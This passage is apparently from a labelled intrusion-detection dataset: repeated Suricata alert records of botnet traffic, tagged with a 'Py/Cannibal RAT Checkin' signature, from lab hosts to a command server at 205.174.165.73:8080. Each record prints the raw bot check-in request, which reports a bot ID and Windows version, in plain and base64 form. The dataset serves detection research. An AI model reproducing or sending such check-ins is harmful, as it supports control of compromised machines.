'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:08:15.723456+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobaVAAIAGT3vAqAoPza6lScu0H5CSSwDioGkvu1ARAQAijQAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,236,584
192.168.10.9-1997-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4015709, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:08:15
92,065
Friday
[{'timestamp': '2017-07-07T13:08:15.856388+0000', 'flow_id': 1935791282433240, 'pcap_cnt': 4015709, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1997, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:08:15.765144+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoft5AAIAGPkjAqAoJza6lSQfNH5BnhJecDTUZKlARAQAkTQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:08:15.856388+0000', 'flow_id': 1935791282433240, 'pcap_cnt': 4015709, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1997, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:08:15.765144+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoft5AAIAGPkjAqAoJza6lSQfNH5BnhJecDTUZKlARAQAkTQAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,236,585
192.168.10.15-52154-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4018963, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:08:25
64,185
Friday
[{'timestamp': '2017-07-07T13:08:25.856495+0000', 'flow_id': 280051325672002, 'pcap_cnt': 4018963, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52154, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:08:25.793154+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobapAAIAGT3bAqAoPza6lScu6H5BAPeWvKi+rd1ARAQCKRQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:08:25.856495+0000', 'flow_id': 280051325672002, 'pcap_cnt': 4018963, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52154, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:08:25.793154+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobapAAIAGT3bAqAoPza6lScu6H5BAPeWvKi+rd1ARAQCKRQAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,236,784
192.168.10.15-52165-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4020081, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:08:35
63,881
Friday
[{'timestamp': '2017-07-07T13:08:35.922869+0000', 'flow_id': 2209406470266493, 'pcap_cnt': 4020081, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52165, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:08:35.859773+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAoba9AAIAGT3HAqAoPza6lScvFH5BHflTfJJNTHlARAQBxvwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:08:35.922869+0000', 'flow_id': 2209406470266493, 'pcap_cnt': 4020081, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52165, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:08:35.859773+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAoba9AAIAGT3HAqAoPza6lScvFH5BHflTfJJNTHlARAQBxvwAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,236,819
192.168.10.15-52167-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4021117, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:08:47
103,488
Friday
[{'timestamp': '2017-07-07T13:08:47.631113+0000', 'flow_id': 716377054711858, 'pcap_cnt': 4021117, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52167, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:08:47.528434+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobbRAAIAGT2zAqAoPza6lScvHH5BVFK4ywbpDqVARAQB9IQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:08:47.631113+0000', 'flow_id': 716377054711858, 'pcap_cnt': 4021117, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52167, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:08:47.528434+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobbRAAIAGT2zAqAoPza6lScvHH5BVFK4ywbpDqVARAQB9IQAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,236,847
192.168.10.15-52169-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4022936, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:09:01
54,699
Friday
[{'timestamp': '2017-07-07T13:09:01.272670+0000', 'flow_id': 1421846908851858, 'pcap_cnt': 4022936, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52169, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:01.218770+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobblAAIAGT2fAqAoPza6lScvJH5Ca9FkKQRyR11ARAQC+1wAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:09:01.272670+0000', 'flow_id': 1421846908851858, 'pcap_cnt': 4022936, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52169, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:01.218770+0000'}, 'payload': 